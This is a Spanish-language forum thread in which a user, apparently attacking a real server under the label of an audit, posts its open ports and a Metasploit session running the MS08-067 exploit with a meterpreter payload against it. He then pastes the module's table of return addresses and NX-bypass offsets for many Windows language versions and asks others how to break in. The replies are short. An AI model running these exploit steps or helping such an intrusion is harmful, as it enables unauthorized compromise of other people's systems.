Hola a todos, estoy auditando un servidor, que por la cantidad de puertos abiertos parece ser muy vulnerable, pero como ya comente hace tiempo, no puedo atacarle mediante el ms08_067_netapi, en puerto 445 abierto (sip, esta abierto), por que no detecta bien el paquete de idiomas del guind0$, estos son los puertos abiertos (que no se os caiga la baba):
7/tcp open echo
9/tcp open discard
13/tcp open daytime
17/tcp open qotd
19/tcp open chargen
21/tcp open ftp
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1027/tcp open IIS
1028/tcp open unknown
1029/tcp open ms-lsa
1030/tcp open iad1
1031/tcp open iad2
1455/tcp open esl-lm
3306/tcp open mysql
3389/tcp open ms-term-serv
8009/tcp open ajp13
8080/tcp open http-proxy
8085/tcp open unknown
8402/tcp open unknown
8443/tcp open https-alt
Bien ahora viene la parte técnica en la cual fallo:
debci@0x81:/pentest/exploits/framework3$ sudo ./msfconsole
[sudo] password for debci:
_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|
=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 491 exploits - 225 auxiliary
+ -- --=[ 251 payloads - 23 encoders - 8 nops
=[ svn r8082 updated today (2010.01.07)
msf > use exploit/windows/smb/ms08_067_netapi 3
RHOST => xxxxxxxxxxtapi) > set RHOST xx.xx.xx.xx
rpreter/bind_tcpmsf exploit(ms08_067_netapi) > set PAYLOAD windows/mete
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 R2 Service Pack 2 - lang:Unknown
[*] Could not determine the exact language pack
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >
Entonces, me puse a investigar (siguiendo un link que el compañero kamsky me proporcionó):
http://www.pentester.es/2009/11/por-que-no-consigo-shell-con-mi.html
Bien, pero en esa guia, se explica como hacerlo trasteando con un proceso .exe de windows, y yo trabajo bajo linux, e aqui el problema, de todos modos me puse a invetsigar sobre el exploit, en mi caso se ejecuta bajo el interprete del framework metasploit, y para mi sorpresa, si que tiene el idioma castellano, el cual es el probable del host, observen:
#
# UNIVERSAL TARGETS
#
#
# Antoine's universal for Windows 2000
# Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET
#
[ 'Windows 2000 Universal',
{
'Ret' => 0x001f1cb0,
'Scratch' => 0x00020408,
}
], # JMP EDI SVCHOST.EXE
#
# Standard return-to-ESI without NX bypass
# Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET
#
[ 'Windows XP SP0/SP1 Universal',
{
'Ret' => 0x01001361,
'Scratch' => 0x00020408,
}
], # JMP ESI SVCHOST.EXE
#
# ENGLISH TARGETS
#
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 English (NX)',
{
'Ret' => 0x6f88f727,
'DisableNX' => 0x6f8916e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 English (NX)',
{
'Ret' => 0x6f88f807,
'DisableNX' => 0x6f8917c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Standard return-to-ESI without NX bypass
[ 'Windows 2003 SP0 Universal',
{
'Ret' => 0x0100129e,
'Scratch' => 0x00020408,
}
], # JMP ESI SVCHOST.EXE
# Standard return-to-ESI without NX bypass
[ 'Windows 2003 SP1 English (NO NX)',
{
'Ret' => 0x71bf21a2,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
# Brett Moore's crafty NX bypass for 2003 SP1
[ 'Windows 2003 SP1 English (NX)',
{
'RetDec' => 0x7c90568c, # dec ESI, ret @SHELL32.DLL
'RetPop' => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c86fed3, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
# Standard return-to-ESI without NX bypass
[ 'Windows 2003 SP2 English (NO NX)',
{
'Ret' => 0x71bf3969,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
# Brett Moore's crafty NX bypass for 2003 SP2
[ 'Windows 2003 SP2 English (NX)',
{
'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL
'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
],
#
# NON-ENGLISH TARGETS - AUTOMATICALLY GENERATED
#
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Arabic (NX)',
{
'Ret' => 0x6fd8f727,
'DisableNX' => 0x6fd916e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Chinese - Traditional / Taiwan (NX)',
{
'Ret' => 0x5860f727,
'DisableNX' => 0x586116e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Chinese - Simplified (NX)',
{
'Ret' => 0x58fbf727,
'DisableNX' => 0x58fc16e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Chinese - Traditional (NX)',
{
'Ret' => 0x5860f727,
'DisableNX' => 0x586116e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Czech (NX)',
{
'Ret' => 0x6fe1f727,
'DisableNX' => 0x6fe216e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Danish (NX)',
{
'Ret' => 0x5978f727,
'DisableNX' => 0x597916e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 German (NX)',
{
'Ret' => 0x6fd9f727,
'DisableNX' => 0x6fda16e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Greek (NX)',
{
'Ret' => 0x592af727,
'DisableNX' => 0x592b16e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Spanish (NX)',
{
'Ret' => 0x6fdbf727,
'DisableNX' => 0x6fdc16e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Finnish (NX)',
{
'Ret' => 0x597df727,
'DisableNX' => 0x597e16e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 French (NX)',
{
'Ret' => 0x595bf727,
'DisableNX' => 0x595c16e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Hebrew (NX)',
{
'Ret' => 0x5940f727,
'DisableNX' => 0x594116e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Hungarian (NX)',
{
'Ret' => 0x5970f727,
'DisableNX' => 0x597116e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Italian (NX)',
{
'Ret' => 0x596bf727,
'DisableNX' => 0x596c16e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Japanese (NX)',
{
'Ret' => 0x567fd3be,
'DisableNX' => 0x568016e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Korean (NX)',
{
'Ret' => 0x6fd6f727,
'DisableNX' => 0x6fd716e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Dutch (NX)',
{
'Ret' => 0x596cf727,
'DisableNX' => 0x596d16e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Norwegian (NX)',
{
'Ret' => 0x597cf727,
'DisableNX' => 0x597d16e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Polish (NX)',
{
'Ret' => 0x5941f727,
'DisableNX' => 0x594216e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Portuguese - Brazilian (NX)',
{
'Ret' => 0x596ff727,
'DisableNX' => 0x597016e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Portuguese (NX)',
{
'Ret' => 0x596bf727,
'DisableNX' => 0x596c16e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Russian (NX)',
{
'Ret' => 0x6fe1f727,
'DisableNX' => 0x6fe216e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Swedish (NX)',
{
'Ret' => 0x597af727,
'DisableNX' => 0x597b16e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Turkish (NX)',
{
'Ret' => 0x5a78f727,
'DisableNX' => 0x5a7916e2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Arabic (NX)',
{
'Ret' => 0x6fd8f807,
'DisableNX' => 0x6fd917c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Chinese - Traditional / Taiwan (NX)',
{
'Ret' => 0x5860f807,
'DisableNX' => 0x586117c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Chinese - Simplified (NX)',
{
'Ret' => 0x58fbf807,
'DisableNX' => 0x58fc17c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Chinese - Traditional (NX)',
{
'Ret' => 0x5860f807,
'DisableNX' => 0x586117c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Czech (NX)',
{
'Ret' => 0x6fe1f807,
'DisableNX' => 0x6fe217c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Danish (NX)',
{
'Ret' => 0x5978f807,
'DisableNX' => 0x597917c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 German (NX)',
{
'Ret' => 0x6fd9f807,
'DisableNX' => 0x6fda17c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Greek (NX)',
{
'Ret' => 0x592af807,
'DisableNX' => 0x592b17c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Spanish (NX)',
{
'Ret' => 0x6fdbf807,
'DisableNX' => 0x6fdc17c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Finnish (NX)',
{
'Ret' => 0x597df807,
'DisableNX' => 0x597e17c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 French (NX)',
{
'Ret' => 0x595bf807,
'DisableNX' => 0x595c17c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Hebrew (NX)',
{
'Ret' => 0x5940f807,
'DisableNX' => 0x594117c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Hungarian (NX)',
{
'Ret' => 0x5970f807,
'DisableNX' => 0x597117c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Italian (NX)',
{
'Ret' => 0x596bf807,
'DisableNX' => 0x596c17c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Japanese (NX)',
{
'Ret' => 0x567fd4d2,
'DisableNX' => 0x568017c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Korean (NX)',
{
'Ret' => 0x6fd6f807,
'DisableNX' => 0x6fd717c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Dutch (NX)',
{
'Ret' => 0x596cf807,
'DisableNX' => 0x596d17c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Norwegian (NX)',
{
'Ret' => 0x597cf807,
'DisableNX' => 0x597d17c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Polish (NX)',
{
'Ret' => 0x5941f807,
'DisableNX' => 0x594217c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Portuguese - Brazilian (NX)',
{
'Ret' => 0x596ff807,
'DisableNX' => 0x597017c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Portuguese (NX)',
{
'Ret' => 0x596bf807,
'DisableNX' => 0x596c17c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Russian (NX)',
{
'Ret' => 0x6fe1f807,
'DisableNX' => 0x6fe217c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Swedish (NX)',
{
'Ret' => 0x597af807,
'DisableNX' => 0x597b17c2,
'Scratch' => 0x00020408
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Turkish (NX)',
{
'Ret' => 0x5a78f807,
'DisableNX' => 0x5a7917c2,
'Scratch' => 0x00020408
}
Una vez dicho esto, quiero pedirles ayuda, como puedo hacerlo? estoy encerrado, no se como hacerlo, y conozco muy pocas vulnerabilidades que explotar, la que mas usaba era la ms08_67_netapi pero esta vez ha fallado, y hechandole con el sacner nessus y un autopwn tampoco tira ( no esperaba mucho de este ultimo -.-').
Admito vulnerabilidades posibles en el host.
Si lo consigo lo masterizare como guia de ataque modelo.
Saludos y gracias a tod@s.
mmm a ver. Se ha hablado varias veces de esto y se ha dicho que puede ser problema de:
Saludos!
Cita de: Shell Root en 8 Enero 2010, 18:28 PM
mmm a ver. Se ha hablado varias veces de esto y se ha dicho que puede ser problema de:
Saludos!
mmmm seguro que el hecho de que no detecte el idioma es problema del firewall?
Saludos
Cita de: ..::| D3Bć1 |::. en 8 Enero 2010, 17:07 PM... y conozco muy pocas vulnerabilidades que explotar, la que mas usaba era la ms08_67_netapi pero esta vez ha fallado.
Lo dijé por esto... :D
Saludos!
Cita de: Shell Root en 8 Enero 2010, 20:25 PM
Cita de: ..::| D3Bć1 |::. en 8 Enero 2010, 17:07 PM... y conozco muy pocas vulnerabilidades que explotar, la que mas usaba era la ms08_67_netapi pero esta vez ha fallado.
Lo dijé por esto... :D
Saludos!
En ese, caso, que em recomiendas hacer ahora?
Saludos
Primero, que brinde muchos servicios no quiere decir que sea muuy vulnerable...(cuando hay un buen admin xD)
Estudiate alguna otra vulnerabilidad, esa no es la unica que existe xD
Salu2